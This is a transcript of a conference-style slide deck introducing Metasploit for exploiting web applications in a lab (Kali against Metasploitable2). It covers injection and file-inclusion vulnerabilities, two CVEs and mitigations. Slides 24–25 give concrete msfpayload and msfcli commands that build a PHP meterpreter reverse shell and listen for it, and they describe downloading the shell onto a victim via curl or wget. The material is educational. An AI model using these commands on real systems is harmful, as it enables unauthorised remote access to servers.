1 / 29

Introduction to Metasploit: Exploiting Web Applications

Dennis Maldonado. @DennisMald. Introduction to Metasploit: Exploiting Web Applications. Dennis Maldonado. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus Computer Information Systems Major Twitter @DennisMald Website / Blog

meira
Download Presentation

Introduction to Metasploit: Exploiting Web Applications

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Dennis Maldonado @DennisMald Introduction to Metasploit:Exploiting Web Applications

  2. Dennis Maldonado • Application Security Specialist • WhiteHat Security • Full-Time Student • University of Houston – Main Campus • Computer Information Systems Major • Twitter • @DennisMald • Website / Blog • KernelMeltdown.org

  3. Tools • Kali Linux – Our attacker machine • Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim. • Metasploitable2 – Victim Web Server

  4. Topic of the day Exploiting the backend server through a web application.

  5. What’s the problem? • Reasons why hackers want to compromise the server: • Run attacks against the internal network • Use the server as a bot • Install backdoors onto the server • Reveal sensitive files/passwords • Execute any local file • Execute remote files • and more…

  6. What’s the problem? • Vulnerabilities that are dangerous against a server • Directory Traversal • Local File Inclusion • Remote File Inclusion • Remote Code Execution • SQL Injection • Command Injection

  7. Directory Traversal http://website.com/?page=index.php

  8. Local File Inclusion http://website.com/?page=index.php

  9. Remote File Inclusion http://website.com/?page=index.php

  10. Remote Code Execution http://website.com/

  11. SQL Injection http://website.com/user.php?id=1&Submit=Submit#

  12. Command Injection

  13. Metasploit Basics

  14. The Metasploit Project • Metasploit is an open-source framework used for Security development and testing • Information gathering and fingerprinting • Exploitation/Penetration testing • Payload generation and encoding • Fuzzing • And much more…

  15. Metasploit Interfaces • Command Line Interfaces • msfconsole • msfcli • GUI Interfaces • Metasploit Community Edition • Armitage

  16. Metasploit Modules • Modules • Exploit – Exploitation/Proof-of-Concept code • Ruby on Rails exploit • PHP-CGI exploit • Auxiliary – Misc. modules for multiple purposes • Scanners • DDOS tools • Fingerprinting • Clients • Payloads – Code to be executed on the exploited system • System Shells • Meterpreter Shells • Post – Modules for post-exploitation tasks • Persistence • Password Stealing • Pivoting

  17. Exploits • Active Exploits • Actively exploit a host. • Ex: Ruby on Rails XML exploit • Passive Exploits • Wait’s for incoming hosts, then exploits them • Ex: Java 0-days • Exploits contain payloads

  18. Payloads • Inline (Non Staged) • Payload containing the exploit and shell code • Stable • Large size • Staged • Exploits victim, establishes connection with attacker, pulls down the payload • Meterpreter • Advanced, dynamic payload. • Extended over the network • Extensible through modules and plugins

  19. Payloads continued • Types of connections • Bind • Local server gets started on victim machine • Attacker connects to victim • windows/x64/shell/bind_tcp • Reverse • Local server gets started on attacker machine • Victim connects to attacker • windows/x64/shell/reverse_tcp

  20. Vulnerabilities and Exploit Examples

  21. PHP-CGI Argument Injection • CVE 2012-1823 • DOS attack • -T 10000 • Source code disclosure • -s argument • Remote Code Execution • -d argument

  22. Ruby on Rails XML Parameter Parsing Vulnerability • CVE-2013-0156 • Easy to find, easy to exploit, critical vulnerability. • Requires just one POST request containing a specially crafted XML data. • Send commands through YAML objects

  23. Unrestricted File Upload • The upload functionality allows for any file type to be uploaded • Upload server-side code and check if it executes • PHP = <?php echo “Hello World!”; ?> • ASP = <% Response.Write"Hello World!" %> • JSP = <%= new java.util.Date().toString() %> • Use msfpayload to create a shell • Use msfcli to listen for a connection from the victim • Upload the shell and execute it

  24. Command Injection • Allows an attacker to execute system level commands. • Attempt a safe command • echo test • uname -a • Use msfpayload to create a shell • Use msfcli to listen for a connection from the victim • Inject curlor wgetcommands to download the shell onto the victim machine. • Chmod if necessary and execute

  25. Commands used(Note, IP addresses and ports may be different) • msfpayloadphp/meterpreter/reverse_tcp O • msfpayloadphp/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O • msfpayloadphp/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php • # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file. • ================================== • msfcli multi/handler payload=php/meterpreter/reverse_tcplhost=10.211.55.3 lport=1337 E

  26. Mitigations and Closing

  27. Mitigations • Keep software up to date! • PHP: 5.4.3, 5.3.13 • Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15 • Use whitelisting for file upload extensions • Watch for extensions and content-types • Don’t let upload directory be executable • Rename files if possible • Don’t pass user input as a system command! • Use library calls when possible • Sanitize input

  28. Questions? Comments?

  29. Sources • BackTrack-Linux • http://www.kali.org/ • The Metasploit Project • http://www.metasploit.com/ • Metasploit Unleashed • http://www.offensive-security.com/metasploit-unleashed/ • PHP-CGI Advisory • http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ • Ruby on Rails Exploitation • https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156 • Damn Vulnerable Web Application (DVWA) • http://www.dvwa.co.uk/ • Metasploitable 2 • http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web

More Related